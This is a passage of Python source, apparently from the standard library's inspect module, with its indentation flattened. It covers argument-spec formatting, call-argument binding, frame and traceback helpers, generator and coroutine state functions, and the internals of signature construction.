result += ': ' + formatannotation(annotations[arg])
return result
specs = []
if defaults:
firstdefault = len(args) - len(defaults)
for i, arg in enumerate(args):
spec = formatargandannotation(arg)
if defaults and i >= firstdefault:
spec = spec + formatvalue(defaults[i - firstdefault])
specs.append(spec)
if varargs is not None:
specs.append(formatvarargs(formatargandannotation(varargs)))
else:
if kwonlyargs:
specs.append('*')
if kwonlyargs:
for kwonlyarg in kwonlyargs:
spec = formatargandannotation(kwonlyarg)
if kwonlydefaults and kwonlyarg in kwonlydefaults:
spec += formatvalue(kwonlydefaults[kwonlyarg])
specs.append(spec)
if varkw is not None:
specs.append(formatvarkw(formatargandannotation(varkw)))
result = '(' + ', '.join(specs) + ')'
if 'return' in annotations:
result += formatreturns(formatannotation(annotations['return']))
return result
def formatargvalues(args, varargs, varkw, locals,
formatarg=str,
formatvarargs=lambda name: '*' + name,
formatvarkw=lambda name: '**' + name,
formatvalue=lambda value: '=' + repr(value)):
"""Format an argument spec from the 4 values returned by getargvalues.
The first four arguments are (args, varargs, varkw, locals). The
next four arguments are the corresponding optional formatting functions
that are called to turn names and values into strings. The ninth
argument is an optional function to format the sequence of arguments."""
def convert(name, locals=locals,
formatarg=formatarg, formatvalue=formatvalue):
return formatarg(name) + formatvalue(locals[name])
specs = []
for i in range(len(args)):
specs.append(convert(args[i]))
if varargs:
specs.append(formatvarargs(varargs) + formatvalue(locals[varargs]))
if varkw:
specs.append(formatvarkw(varkw) + formatvalue(locals[varkw]))
return '(' + ', '.join(specs) + ')'
def _missing_arguments(f_name, argnames, pos, values):
names = [repr(name) for name in argnames if name not in values]
missing = len(names)
if missing == 1:
s = names[0]
elif missing == 2:
s = "{} and {}".format(*names)
else:
tail = ", {} and {}".format(*names[-2:])
del names[-2:]
s = ", ".join(names) + tail
raise TypeError("%s() missing %i required %s argument%s: %s" %
(f_name, missing,
"positional" if pos else "keyword-only",
"" if missing == 1 else "s", s))
def _too_many(f_name, args, kwonly, varargs, defcount, given, values):
atleast = len(args) - defcount
kwonly_given = len([arg for arg in kwonly if arg in values])
if varargs:
plural = atleast != 1
sig = "at least %d" % (atleast,)
elif defcount:
plural = True
sig = "from %d to %d" % (atleast, len(args))
else:
plural = len(args) != 1
sig = str(len(args))
kwonly_sig = ""
if kwonly_given:
msg = " positional argument%s (and %d keyword-only argument%s)"
kwonly_sig = (msg % ("s" if given != 1 else "", kwonly_given,
"s" if kwonly_given != 1 else ""))
raise TypeError("%s() takes %s positional argument%s but %d%s %s given" %
(f_name, sig, "s" if plural else "", given, kwonly_sig,
"was" if given == 1 and not kwonly_given else "were"))
def getcallargs(*func_and_positional, **named):
"""Get the mapping of arguments to values.
A dict is returned, with keys the function argument names (including the
names of the * and ** arguments, if any), and values the respective bound
values from 'positional' and 'named'."""
func = func_and_positional[0]
positional = func_and_positional[1:]
spec = getfullargspec(func)
args, varargs, varkw, defaults, kwonlyargs, kwonlydefaults, ann = spec
f_name = func.__name__
arg2value = {}
if ismethod(func) and func.__self__ is not None:
# implicit 'self' (or 'cls' for classmethods) argument
positional = (func.__self__,) + positional
num_pos = len(positional)
num_args = len(args)
num_defaults = len(defaults) if defaults else 0
n = min(num_pos, num_args)
for i in range(n):
arg2value[args[i]] = positional[i]
if varargs:
arg2value[varargs] = tuple(positional[n:])
possible_kwargs = set(args + kwonlyargs)
if varkw:
arg2value[varkw] = {}
for kw, value in named.items():
if kw not in possible_kwargs:
if not varkw:
raise TypeError("%s() got an unexpected keyword argument %r" %
(f_name, kw))
arg2value[varkw][kw] = value
continue
if kw in arg2value:
raise TypeError("%s() got multiple values for argument %r" %
(f_name, kw))
arg2value[kw] = value
if num_pos > num_args and not varargs:
_too_many(f_name, args, kwonlyargs, varargs, num_defaults,
num_pos, arg2value)
if num_pos < num_args:
req = args[:num_args - num_defaults]
for arg in req:
if arg not in arg2value:
_missing_arguments(f_name, req, True, arg2value)
for i, arg in enumerate(args[num_args - num_defaults:]):
if arg not in arg2value:
arg2value[arg] = defaults[i]
missing = 0
for kwarg in kwonlyargs:
if kwarg not in arg2value:
if kwonlydefaults and kwarg in kwonlydefaults:
arg2value[kwarg] = kwonlydefaults[kwarg]
else:
missing += 1
if missing:
_missing_arguments(f_name, kwonlyargs, False, arg2value)
return arg2value
ClosureVars = namedtuple('ClosureVars', 'nonlocals globals builtins unbound')
def getclosurevars(func):
"""
Get the mapping of free variables to their current values.
Returns a named tuple of dicts mapping the current nonlocal, global
and builtin references as seen by the body of the function. A final
set of unbound names that could not be resolved is also provided.
"""
if ismethod(func):
func = func.__func__
if not isfunction(func):
raise TypeError("{!r} is not a Python function".format(func))
code = func.__code__
# Nonlocal references are named in co_freevars and resolved
# by looking them up in __closure__ by positional index
if func.__closure__ is None:
nonlocal_vars = {}
else:
nonlocal_vars = {
var : cell.cell_contents
for var, cell in zip(code.co_freevars, func.__closure__)
}
# Global and builtin references are named in co_names and resolved
# by looking them up in __globals__ or __builtins__
global_ns = func.__globals__
builtin_ns = global_ns.get("__builtins__", builtins.__dict__)
if ismodule(builtin_ns):
builtin_ns = builtin_ns.__dict__
global_vars = {}
builtin_vars = {}
unbound_names = set()
for name in code.co_names:
if name in ("None", "True", "False"):
# Because these used to be builtins instead of keywords, they
# may still show up as name references. We ignore them.
continue
try:
global_vars[name] = global_ns[name]
except KeyError:
try:
builtin_vars[name] = builtin_ns[name]
except KeyError:
unbound_names.add(name)
return ClosureVars(nonlocal_vars, global_vars,
builtin_vars, unbound_names)
# -------------------------------------------------- stack frame extraction
Traceback = namedtuple('Traceback', 'filename lineno function code_context index')
def getframeinfo(frame, context=1):
"""Get information about a frame or traceback object.
A tuple of five things is returned: the filename, the line number of
the current line, the function name, a list of lines of context from
the source code, and the index of the current line within that list.
The optional second argument specifies the number of lines of context
to return, which are centered around the current line."""
if istraceback(frame):
lineno = frame.tb_lineno
frame = frame.tb_frame
else:
lineno = frame.f_lineno
if not isframe(frame):
raise TypeError('{!r} is not a frame or traceback object'.format(frame))
filename = getsourcefile(frame) or getfile(frame)
if context > 0:
start = lineno - 1 - context//2
try:
lines, lnum = findsource(frame)
except OSError:
lines = index = None
else:
start = max(0, min(start, len(lines) - context))
lines = lines[start:start+context]
index = lineno - 1 - start
else:
lines = index = None
return Traceback(filename, lineno, frame.f_code.co_name, lines, index)
def getlineno(frame):
"""Get the line number from a frame object, allowing for optimization."""
# FrameType.f_lineno is now a descriptor that grovels co_lnotab
return frame.f_lineno
FrameInfo = namedtuple('FrameInfo', ('frame',) + Traceback._fields)
def getouterframes(frame, context=1):
"""Get a list of records for a frame and all higher (calling) frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while frame:
frameinfo = (frame,) + getframeinfo(frame, context)
framelist.append(FrameInfo(*frameinfo))
frame = frame.f_back
return framelist
def getinnerframes(tb, context=1):
"""Get a list of records for a traceback's frame and all lower frames.
Each record contains a frame object, filename, line number, function
name, a list of lines of context, and index within the context."""
framelist = []
while tb:
frameinfo = (tb.tb_frame,) + getframeinfo(tb, context)
framelist.append(FrameInfo(*frameinfo))
tb = tb.tb_next
return framelist
def currentframe():
"""Return the frame of the caller or None if this is not possible."""
return sys._getframe(1) if hasattr(sys, "_getframe") else None
def stack(context=1):
"""Return a list of records for the stack above the caller's frame."""
return getouterframes(sys._getframe(1), context)
def trace(context=1):
"""Return a list of records for the stack below the current exception."""
return getinnerframes(sys.exc_info()[2], context)
# ------------------------------------------------ static version of getattr
_sentinel = object()
def _static_getmro(klass):
return type.__dict__['__mro__'].__get__(klass)
def _check_instance(obj, attr):
instance_dict = {}
try:
instance_dict = object.__getattribute__(obj, "__dict__")
except AttributeError:
pass
return dict.get(instance_dict, attr, _sentinel)
def _check_class(klass, attr):
for entry in _static_getmro(klass):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
return _sentinel
def _is_type(obj):
try:
_static_getmro(obj)
except TypeError:
return False
return True
def _shadowed_dict(klass):
dict_attr = type.__dict__["__dict__"]
for entry in _static_getmro(klass):
try:
class_dict = dict_attr.__get__(entry)["__dict__"]
except KeyError:
pass
else:
if not (type(class_dict) is types.GetSetDescriptorType and
class_dict.__name__ == "__dict__" and
class_dict.__objclass__ is entry):
return class_dict
return _sentinel
def getattr_static(obj, attr, default=_sentinel):
"""Retrieve attributes without triggering dynamic lookup via the
descriptor protocol, __getattr__ or __getattribute__.
Note: this function may not be able to retrieve all attributes
that getattr can fetch (like dynamically created attributes)
and may find attributes that getattr can't (like descriptors
that raise AttributeError). It can also return descriptor objects
instead of instance members in some cases. See the
documentation for details.
"""
instance_result = _sentinel
if not _is_type(obj):
klass = type(obj)
dict_attr = _shadowed_dict(klass)
if (dict_attr is _sentinel or
type(dict_attr) is types.MemberDescriptorType):
instance_result = _check_instance(obj, attr)
else:
klass = obj
klass_result = _check_class(klass, attr)
if instance_result is not _sentinel and klass_result is not _sentinel:
if (_check_class(type(klass_result), '__get__') is not _sentinel and
_check_class(type(klass_result), '__set__') is not _sentinel):
return klass_result
if instance_result is not _sentinel:
return instance_result
if klass_result is not _sentinel:
return klass_result
if obj is klass:
# for types we check the metaclass too
for entry in _static_getmro(type(klass)):
if _shadowed_dict(type(entry)) is _sentinel:
try:
return entry.__dict__[attr]
except KeyError:
pass
if default is not _sentinel:
return default
raise AttributeError(attr)
# ------------------------------------------------ generator introspection
GEN_CREATED = 'GEN_CREATED'
GEN_RUNNING = 'GEN_RUNNING'
GEN_SUSPENDED = 'GEN_SUSPENDED'
GEN_CLOSED = 'GEN_CLOSED'
def getgeneratorstate(generator):
"""Get current state of a generator-iterator.
Possible states are:
GEN_CREATED: Waiting to start execution.
GEN_RUNNING: Currently being executed by the interpreter.
GEN_SUSPENDED: Currently suspended at a yield expression.
GEN_CLOSED: Execution has completed.
"""
if generator.gi_running:
return GEN_RUNNING
if generator.gi_frame is None:
return GEN_CLOSED
if generator.gi_frame.f_lasti == -1:
return GEN_CREATED
return GEN_SUSPENDED
def getgeneratorlocals(generator):
"""
Get the mapping of generator local variables to their current values.
A dict is returned, with the keys the local variable names and values the
bound values."""
if not isgenerator(generator):
raise TypeError("{!r} is not a Python generator".format(generator))
frame = getattr(generator, "gi_frame", None)
if frame is not None:
return generator.gi_frame.f_locals
else:
return {}
# ------------------------------------------------ coroutine introspection
CORO_CREATED = 'CORO_CREATED'
CORO_RUNNING = 'CORO_RUNNING'
CORO_SUSPENDED = 'CORO_SUSPENDED'
CORO_CLOSED = 'CORO_CLOSED'
def getcoroutinestate(coroutine):
"""Get current state of a coroutine object.
Possible states are:
CORO_CREATED: Waiting to start execution.
CORO_RUNNING: Currently being executed by the interpreter.
CORO_SUSPENDED: Currently suspended at an await expression.
CORO_CLOSED: Execution has completed.
"""
if coroutine.cr_running:
return CORO_RUNNING
if coroutine.cr_frame is None:
return CORO_CLOSED
if coroutine.cr_frame.f_lasti == -1:
return CORO_CREATED
return CORO_SUSPENDED
def getcoroutinelocals(coroutine):
"""
Get the mapping of coroutine local variables to their current values.
A dict is returned, with the keys the local variable names and values the
bound values."""
frame = getattr(coroutine, "cr_frame", None)
if frame is not None:
return frame.f_locals
else:
return {}
###############################################################################
### Function Signature Object (PEP 362)
###############################################################################
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_ClassMethodWrapper = type(int.__dict__['from_bytes'])
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
_ClassMethodWrapper,
types.BuiltinFunctionType)
def _signature_get_user_defined_method(cls, method_name):
"""Private helper. Checks if ``cls`` has an attribute
named ``method_name`` and returns it only if it is a
pure python function.
"""
try:
meth = getattr(cls, method_name)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def _signature_get_partial(wrapped_sig, partial, extra_args=()):
"""Private helper to calculate how 'wrapped_sig' signature will
look like after applying a 'functools.partial' object (or alike)
on it.
"""
old_params = wrapped_sig.parameters
new_params = OrderedDict(old_params.items())
partial_args = partial.args or ()
partial_keywords = partial.keywords or {}
if extra_args:
partial_args = extra_args + partial_args
try:
ba = wrapped_sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {!r} has incorrect arguments'.format(partial)
raise ValueError(msg) from ex
transform_to_kwonly = False
for param_name, param in old_params.items():
try:
arg_value = ba.arguments[param_name]
except KeyError:
pass
else:
if param.kind is _POSITIONAL_ONLY:
# If positional-only parameter is bound by partial,
# it effectively disappears from the signature
new_params.pop(param_name)
continue
if param.kind is _POSITIONAL_OR_KEYWORD:
if param_name in partial_keywords:
# This means that this parameter, and all parameters
# after it should be keyword-only (and var-positional
# should be removed). Here's why. Consider the following
# function:
# foo(a, b, *args, c):
# pass
#
# "partial(foo, a='spam')" will have the following
# signature: "(*, a='spam', b, c)". Because attempting
# to call that partial with "(10, 20)" arguments will
# raise a TypeError, saying that "a" argument received
# multiple values.
transform_to_kwonly = True
# Set the new default value
new_params[param_name] = param.replace(default=arg_value)
else:
# was passed as a positional argument
new_params.pop(param.name)
continue
if param.kind is _KEYWORD_ONLY:
# Set the new default value
new_params[param_name] = param.replace(default=arg_value)
if transform_to_kwonly:
assert param.kind is not _POSITIONAL_ONLY
if param.kind is _POSITIONAL_OR_KEYWORD:
new_param = new_params[param_name].replace(kind=_KEYWORD_ONLY)
new_params[param_name] = new_param
new_params.move_to_end(param_name)
elif param.kind in (_KEYWORD_ONLY, _VAR_KEYWORD):
new_params.move_to_end(param_name)
elif param.kind is _VAR_POSITIONAL:
new_params.pop(param.name)
return wrapped_sig.replace(parameters=new_params.values())
def _signature_bound_method(sig):
"""Private helper to transform signatures for unbound
functions to bound methods.
"""
params = tuple(sig.parameters.values())
if not params or params[0].kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
raise ValueError('invalid method signature')
kind = params[0].kind
if kind in (_POSITIONAL_OR_KEYWORD, _POSITIONAL_ONLY):
# Drop first parameter:
# '(p1, p2[, ...])' -> '(p2[, ...])'
params = params[1:]
else:
if kind is not _VAR_POSITIONAL:
# Unless we add a new parameter type we never
# get here
raise ValueError('invalid argument type')
# It's a var-positional parameter.
# Do nothing. '(*args[, ...])' -> '(*args[, ...])'
return sig.replace(parameters=params)
def _signature_is_builtin(obj):
"""Private helper to test if `obj` is a callable that might
support Argument Clinic's __text_signature__ protocol.
"""
return (isbuiltin(obj) or
ismethoddescriptor(obj) or
isinstance(obj, _NonUserDefinedCallables) or
# Can't test 'isinstance(type)' here, as it would
# also be True for regular python classes
obj in (type, object))
def _signature_is_functionlike(obj):
"""Private helper to test if `obj` is a duck type of FunctionType.
A good example of such objects are functions compiled with
Cython, which have all attributes that a pure Python function
would have, but have their code statically compiled.
"""
if not callable(obj) or isclass(obj):
# All function-like objects are obviously callables,
# and not classes.
return False
name = getattr(obj, '__name__', None)
code = getattr(obj, '__code__', None)
defaults = getattr(obj, '__defaults__', _void) # Important to use _void ...
kwdefaults = getattr(obj, '__kwdefaults__', _void) # ... and not None here
annotations = getattr(obj, '__annotations__', None)
return (isinstance(code, types.CodeType) and
isinstance(name, str) and
(defaults is None or isinstance(defaults, tuple)) and
(kwdefaults is None or isinstance(kwdefaults, dict)) and
isinstance(annotations, dict))
def _signature_get_bound_param(spec):
""" Private helper to get first parameter name from a
__text_signature__ of a builtin method, which should
be in the following format: '($param1, ...)'.
Assumptions are that the first argument won't have
a default value or an annotation.
"""
assert spec.startswith('($')
pos = spec.find(',')
if pos == -1:
pos = spec.find(')')
cpos = spec.find(':')
assert cpos == -1 or cpos > pos
cpos = spec.find('=')
assert cpos == -1 or cpos > pos
return spec[2:pos]
def _signature_strip_non_python_syntax(signature):
"""
Private helper function. Takes a signature in Argument Clinic's
extended signature format.
Returns a tuple of three things:
* that signature re-rendered in standard Python syntax,
* the index of the "self" parameter (generally 0), or None if
the function does not have a "self" parameter, and
* the index of the last "positional only" parameter,
or None if the signature has no positional-only parameters.
"""
if not signature:
return signature, None, None
self_parameter = None
last_positional_only = None
lines = [l.encode('ascii') for l in signature.split('\n')]
generator = iter(lines).__next__
token_stream = tokenize.tokenize(generator)
delayed_comma = False
skip_next_comma = False
text = []
add = text.append
current_parameter = 0
OP = token.OP
ERRORTOKEN = token.ERRORTOKEN
# token stream always starts with ENCODING token, skip it
t = next(token_stream)
assert t.type == tokenize.ENCODING
for t in token_stream:
type, string = t.type, t.string
if type == OP:
if string == ',':
if skip_next_comma:
skip_next_comma = False
else:
assert not delayed_comma
delayed_comma = True
current_parameter += 1
continue
if string == '/':
assert not skip_next_comma
assert last_positional_only is None
skip_next_comma = True
last_positional_only = current_parameter - 1
continue
if (type == ERRORTOKEN) and (string == '$'):
assert self_parameter is None
self_parameter = current_parameter
continue
if delayed_comma:
delayed_comma = False
if not ((type == OP) and (string == ')')):
add(', ')
add(string)
if (string == ','):
add(' ')
clean_signature = ''.join(text)
return clean_signature, self_parameter, last_positional_only
def _signature_fromstr(cls, obj, s, skip_bound_arg=True):
"""Private helper to parse content of '__text_signature__'
and return a Signature based on it.
"""
# Lazy import ast because it's relatively heavy and
# it's not used for other than this function.
import ast
Parameter = cls._parameter_cls
clean_signature, self_parameter, last_positional_only = \
_signature_strip_non_python_syntax(s)
program = "def foo" + clean_signature + ": pass"
try:
module = ast.parse(program)
except SyntaxError:
module = None
if not isinstance(module, ast.Module):
raise ValueError("{!r} builtin has invalid signature".format(obj))
f = module.body[0]
parameters = []
empty = Parameter.empty
invalid = object()
module = None
module_dict = {}
module_name = getattr(obj, '__module__', None)
if module_name:
module = sys.modules.get(module_name, None)
if module:
module_dict = module.__dict__
sys_module_dict = sys.modules.copy()
def parse_name(node):
assert isinstance(node, ast.arg)
if node.annotation != None:
raise ValueError("Annotations are not currently supported")
return node.arg
def wrap_value(s):
try:
value = eval(s, module_dict)
except NameError:
try:
value = eval(s, sys_module_dict)
except NameError:
raise RuntimeError()
if isinstance(value, str):
return ast.Str(value)
if isinstance(value, (int, float)):
return ast.Num(value)
if isinstance(value, bytes):
return ast.Bytes(value)
if value in (True, False, None):
return ast.NameConstant(value)
raise RuntimeError()
class RewriteSymbolics(ast.NodeTransformer):
def visit_Attribute(self, node):
a = []
n = node
while isinstance(n, ast.Attribute):
a.append(n.attr)
n = n.value
if not isinstance(n, ast.Name):
raise RuntimeError()
a.append(n.id)
value = ".".join(reversed(a))
return wrap_value(value)
def visit_Name(self, node):
if not isinstance(node.ctx, ast.Load):
raise ValueError()
return wrap_value(node.id)
def p(name_node, default_node, default=empty):
name = parse_name(name_node)
if name is invalid:
return None
if default_node and default_node is not _empty:
try:
default_node = RewriteSymbolics().visit(default_node)
o = ast.literal_eval(default_node)
except ValueError:
o = invalid
if o is invalid:
return None
default = o if o is not invalid else default
parameters.append(Parameter(name, kind, default=default, annotation=empty))
# non-keyword-only parameters
args = reversed(f.args.args)
defaults = reversed(f.args.defaults)
iter = itertools.zip_longest(args, defaults, fillvalue=None)
if last_positional_only is not None:
kind = Parameter.POSITIONAL_ONLY
else:
kind = Parameter.POSITIONAL_OR_KEYWORD
for i, (name, default) in enumerate(reversed(list(iter))):
p(name, default)
if i == last_positional_only:
kind = Parameter.POSITIONAL_OR_KEYWORD
# *args
if f.args.vararg:
kind = Parameter.VAR_POSITIONAL
p(f.args.vararg, empty)
# keyword-only arguments
kind = Parameter.KEYWORD_ONLY
for name, default in zip(f.args.kwonlyargs, f.args.kw_defaults):
p(name, default)
# **kwargs
if f.args.kwarg:
kind = Parameter.VAR_KEYWORD
p(f.args.kwarg, empty)
if self_parameter is not None:
# Possibly strip the bound argument:
# - We *always* strip first bound argument if
# it is a module.
# - We don't strip first bound argument if
# skip_bound_arg is False.
assert parameters
_self = getattr(obj, '__self__', None)
self_isbound = _self is not None
self_ismodule = ismodule(_self)
if self_isbound and (self_ismodule or skip_bound_arg):
parameters.pop(0)
else:
# for builtins, self parameter is always positional-only!
p = parameters[0].replace(kind=Parameter.POSITIONAL_ONLY)
parameters[0] = p
return cls(parameters, return_annotation=cls.empty)
def _signature_from_builtin(cls, func, skip_bound_arg=True):
"""Private helper function to get signature for
builtin callables.
"""
if not _signature_is_builtin(func):
raise TypeError("{!r} is not a Python builtin "
"function".format(func))
s = getattr(func, "__text_signature__", None)
if not s:
raise ValueError("no signature found for builtin {!r}".format(func))
return _signature_fromstr(cls, func, s, skip_bound_arg)
def _signature_from_function(cls, func):
"""Private helper: constructs Signature for the given python function."""
is_duck_function = False
if not isfunction(func):
if _signature_is_functionlike(func):
is_duck_function = True
else:
# If it's not a pure Python function, and not a duck type
# of pure function:
raise TypeError('{!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = func_code.co_kwonlyargcount
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = func.__annotations__
defaults = func.__defaults__
kwdefaults = func.__kwdefaults__
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & CO_VARARGS:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & CO_VARKEYWORDS:
index = pos_count + keyword_only_count
if func_code.co_flags & CO_VARARGS:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
# Is 'func' is a pure Python function - don't validate the
# parameters list (for correct order and defaults), it should be OK.
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=is_duck_function)
def _signature_from_callable(obj, *,
follow_wrapper_chains=True,
skip_bound_arg=True,
sigcls):
"""Private helper function to get signature for arbitrary
callable objects.
"""
if not callable(obj):
raise TypeError('{!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
# In this case we skip the first parameter of the underlying
# function (usually `self` or `cls`).
sig = _signature_from_callable(
obj.__func__,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
if skip_bound_arg:
return _signature_bound_method(sig)
else:
return sig
# Was this function wrapped by a decorator?
if follow_wrapper_chains:
obj = unwrap(obj, stop=(lambda f: hasattr(f, "__signature__")))
if isinstance(obj, types.MethodType):
# If the unwrapped object is a *method*, we might want to
# skip its first parameter (self).
# See test_signature_wrapped_bound_method for details.
return _signature_from_callable(
obj,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
if not isinstance(sig, Signature):
raise TypeError(
'unexpected object {!r} in __signature__ '
'attribute'.format(sig))
return sig
try:
partialmethod = obj._partialmethod
except AttributeError:
pass
else:
if isinstance(partialmethod, functools.partialmethod):
# Unbound partialmethod (see functools.partialmethod)
# This means, that we need to calculate the signature
# as if it's a regular partial object, but taking into
# account that the first positional argument
# (usually `self`, or `cls`) will not be passed
# automatically (as for boundmethods)
wrapped_sig = _signature_from_callable(
partialmethod.func,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
sig = _signature_get_partial(wrapped_sig, partialmethod, (None,))
first_wrapped_param = tuple(wrapped_sig.parameters.values())[0]
if first_wrapped_param.kind is Parameter.VAR_POSITIONAL:
# First argument of the wrapped callable is `*args`, as in
# `partialmethod(lambda *args)`.
return sig
else:
sig_params = tuple(sig.parameters.values())
assert (not sig_params or
first_wrapped_param is not sig_params[0])
new_params = (first_wrapped_param,) + sig_params
return sig.replace(parameters=new_params)
if isfunction(obj) or _signature_is_functionlike(obj):
# If it's a pure Python function, or an object that is duck type
# of a Python function (Cython functions, for instance), then:
return _signature_from_function(sigcls, obj)
if _signature_is_builtin(obj):
return _signature_from_builtin(sigcls, obj,
skip_bound_arg=skip_bound_arg)
if isinstance(obj, functools.partial):
wrapped_sig = _signature_from_callable(
obj.func,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
return _signature_get_partial(wrapped_sig, obj)
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _signature_get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = _signature_from_callable(
call,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _signature_get_user_defined_method(obj, '__new__')
if new is not None:
sig = _signature_from_callable(
new,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
else:
# Finally, we should have at least __init__ implemented
init = _signature_get_user_defined_method(obj, '__init__')
if init is not None:
sig = _signature_from_callable(
init,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
if sig is None:
# At this point we know, that `obj` is a class, with no user-
# defined '__init__', '__new__', or class-level '__call__'
for base in obj.__mro__[:-1]:
# Since '__text_signature__' is implemented as a
# descriptor that extracts text signature from the
# class docstring, if 'obj' is derived from a builtin
# class, its own '__text_signature__' may be 'None'.
# Therefore, we go through the MRO (except the last
# class in there, which is 'object') to find the first
# class with non-empty text signature.
try:
text_sig = base.__text_signature__
except AttributeError:
pass
else:
if text_sig:
# If 'obj' class has a __text_signature__ attribute:
# return a signature based on it
return _signature_fromstr(sigcls, obj, text_sig)
# No '__text_signature__' was found for the 'obj' class.
# Last option is to check if its '__init__' is
# object.__init__ or type.__init__.
if type not in obj.__mro__:
# We have a class (not metaclass), but no user-defined
# __init__ or __new__ for it
if (obj.__init__ is object.__init__ and
obj.__new__ is object.__new__):
# Return a signature of 'object' builtin.
return signature(object)
else:
raise ValueError(
'no signature found for builtin type {!r}'.format(obj))
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _signature_get_user_defined_method(type(obj), '__call__')
if call is not None:
try:
sig = _signature_from_callable(
call,
follow_wrapper_chains=follow_wrapper_chains,
skip_bound_arg=skip_bound_arg,
sigcls=sigcls)
except ValueError as ex:
msg = 'no signature found for {!r}'.format(obj)
raise ValueError(msg) from ex
if sig is not None:
# For classes and objects we skip the first parameter of their
# __call__, __new__, or __init__ methods
if skip_bound_arg:
return _signature_bound_method(sig)
else:
return sig
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {!r} is not supported by signature'.format(obj))
class _void:
"""A private marker - used in Parameter & Signature."""
class _empty:
"""Marker object for Signature.empty and Parameter.empty."""
class _ParameterKind(enum.IntEnum):
POSITIONAL_ONLY = 0
POSITIONAL_OR_KEYWORD = 1
VAR_POSITIONAL = 2
KEYWORD_ONLY = 3
VAR_KEYWORD = 4
def __str__(self):
return self._name_
_POSITIONAL_ONLY = _ParameterKind.POSITIONAL_ONLY
_POSITIONAL_OR_KEYWORD = _ParameterKind.POSITIONAL_OR_KEYWORD
_VAR_POSITIONAL = _ParameterKind.VAR_POSITIONAL
_KEYWORD_ONLY = _ParameterKind.KEYWORD_ONLY
_VAR_KEYWORD = _ParameterKind.VAR_KEYWORD
_PARAM_NAME_MAPPING = {
_POSITIONAL_ONLY: 'positional-only',
_POSITIONAL_OR_KEYWORD: 'positional or keyword',
_VAR_POSITIONAL: 'variadic positional',
_KEYWORD_ONLY: 'keyword-only',
_VAR_KEYWORD: 'variadic keyword'
}
_get_paramkind_descr = _PARAM_NAME_MAPPING.__getitem__
class Parameter:
"""Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is set to
`Parameter.empty`.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is set to
`Parameter.empty`.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
"""
__slots__ = ('_name', '_kind', '_default', '_annotation')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, *, default=_empty, annotation=_empty):
try:
self._kind = _ParameterKind(kind)
except ValueError:
raise ValueError(f'value {kind!r} is not a valid Parameter.kind')
if default is not _empty:
if self._kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{} parameters cannot have default values'
